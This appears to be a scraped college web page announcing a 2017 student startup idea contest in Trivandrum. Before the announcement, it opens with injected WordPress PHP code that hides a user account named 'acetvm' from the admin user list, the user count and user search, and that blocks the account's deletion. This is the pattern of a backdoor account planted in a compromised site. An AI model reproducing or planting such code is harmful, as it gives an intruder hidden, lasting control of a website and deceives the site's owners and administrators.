add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'acetvm') { wp_die( __('User acetvm tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; });

The Startup League | Startup Idea Hunt show | Oct 07, 2017


Millionminds, under the patronage of StartupIndia (A Govt. of India initiative), is organizing “The Startup League”, a Pan India Startup Idea Hunt show for Students. ACE College of Engineering is hosting the Trivandrum chapter of this event on October 07, 2017.

 

Highlights of The Startup League:-

  1. Happening across 40 cities in India
  2. With 400+ colleges to participate Pan India
  3. Engaging 50,000+ Students
  4. Involvement of industry bodies and speakers from Startup Ecosystem

 

 

Benefits for Student:

  1. A Platform for Students to showcase their innovative business idea or a product solution.
  2. Selected Students to get a Chance to participate in Grand Finale of “The Startup League” which will be happening in Mumbai, Delhi and Bangalore.
  3. Grand Finale will be a highly media emphasized event with big investors to offer investment opportunity to students with best innovative business ideas.
  4. Majorly focused on reaching out to youth from non-metro locations.
  5. No registration fee.

So if you have a strong viable business idea or product/prototype, kindly register at thestartupleague.co.in.

Last date for registration is Oct 04, 2017.